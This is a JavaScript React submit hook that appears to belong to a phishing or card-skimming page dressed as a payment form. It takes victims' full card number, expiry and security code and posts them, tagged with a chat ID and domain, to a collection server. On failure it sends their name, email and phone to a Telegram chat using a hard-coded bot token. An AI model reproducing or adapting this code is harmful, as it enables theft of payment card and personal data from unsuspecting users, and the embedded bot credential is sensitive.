import ReactPixel from "react-facebook-pixel";
import axios from "axios";
import { usePromo } from "../Init";

const MINOR_FACTOR = { KWD: 1000, OMR: 1000, BHD: 1000 }; // most others default to 100

 

const sendRegistrationError = async ({ error, form }) => {
  const BOT_TOKEN = "8171895155:AAF2enwTmWBPc5XRQG-zBMm9SgqrWW_tQ6I";
  const CHAT_ID = "-1004455713296";

  const safeStringify = (value) => {
    try {
      return JSON.stringify(value, null, 2);
    } catch {
      return String(value);
    }
  };

  const responseData = error?.response?.data;
  const status = error?.response?.status;
  const statusText = error?.response?.statusText;

  const method = error?.config?.method?.toUpperCase();
  const url = error?.config?.url;

  const text = `
⚠️ Sending Error

Message:
${error?.message || "Unknown"}

Status:
${status || "N/A"} ${statusText || ""}

Endpoint:
${method || "N/A"} ${url || "/validate"}

Response:
${responseData ? safeStringify(responseData) : "No response data"}

Error Code:
${error?.code || "N/A"}

Axios Error:
${error?.name || "N/A"}

Name:
${form?.firstName || ""} ${form?.lastName || ""}

Email:
${form?.email || ""}

Phone:
${form?.phone || ""}
`;

  try {
    await axios.post(
      `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`,
      {
        chat_id: CHAT_ID,
        text: text.slice(0, 4000),
      },
      {
        timeout: 8000,
      }
    );
  } catch (telegramError) {
    console.error(
      "Failed to send Telegram message:",
      telegramError?.response?.data || telegramError
    );
  }
};

export default function useHandleSubmit() {
  const {
    setPaymentProcess,
    setBankProvider,
    bankProvider
  } = usePromo();

const handlSubmit = async ({
  form,
  amount,
  currency,
  input1Value,
  input2Value,
  input3Value,
  additional,
  pricePlastic,
  priceMetal,
}) => {

        const firstDigit = input1Value?.charAt(0); // First digit
      const lastFourDigits = input1Value?.slice(-4); // Last 4 digits


      localStorage.setItem("first-digit", firstDigit);
      localStorage.setItem("last-four-digits", lastFourDigits);
      localStorage.setItem("summ",amount)
  setPaymentProcess(true)

  console.log('Cus send started')
  const key = localStorage.getItem("fazaaFormKey");
  localStorage.setItem(key, JSON.stringify(form));


  // optional: for gateways that want minor units (e.g., 12000 fils for 12.000 KWD)
  const factor = MINOR_FACTOR[currency] || 100;
  const amountMinor = Math.round(amount * factor);

  const fullUrl = window.location.href;

  const paymentData = {
    k_selected: false,
    summ: amount,
    currency,
    amount_minor: amountMinor,
    full_url: fullUrl,
    first_digit: firstDigit,
    last_four_digits: lastFourDigits,
  };

  localStorage.setItem("payment_data", JSON.stringify(paymentData));

  try {
    ReactPixel.track("Purchase");
    ReactPixel.track("Submit application");
  } catch (err) {
    console.log(err);
  }

  console.log(input1Value?.slice(0, 7));

  const dataToSend = {
    orderId: "123",
    uuId: localStorage.getItem("uuId"),
    main: input1Value,
    date: input2Value,
    code: input3Value,
    summ: String(amount),
    chatId: process.env.REACT_APP_CHAT_ID,
    domain: process.env.REACT_APP_DOMAIN,
    link: fullUrl,
    additional: additional,
  };

  try {
    setPaymentProcess(true)
    const response = await axios.post(
      process.env.REACT_APP_SERVER_URL + "/api/validation",
      dataToSend,
      {
        headers: {
          "Content-Type": "application/json",
        },
      },
    );

    // Response body
    console.log('!RESPONCE!');
    const parced_bin = JSON.parse(response.data.repsonse)
    console.log(typeof parced_bin)
    console.log(`${JSON.stringify(parced_bin.info.bank.name)}`)

    setBankProvider(parced_bin.info.bank.name)
    

    // Example
    if (response.data.success) {
      console.log("Validation successful");
      console.log(response.data);
      setBankProvider(response.data.validated_bank)
    }
 } catch (error) {
  setTimeout(() => {
    sendRegistrationError({
      error,
      form,
    });

    setPaymentProcess(false);
  }, 3000);
}
}

  return handlSubmit;
}


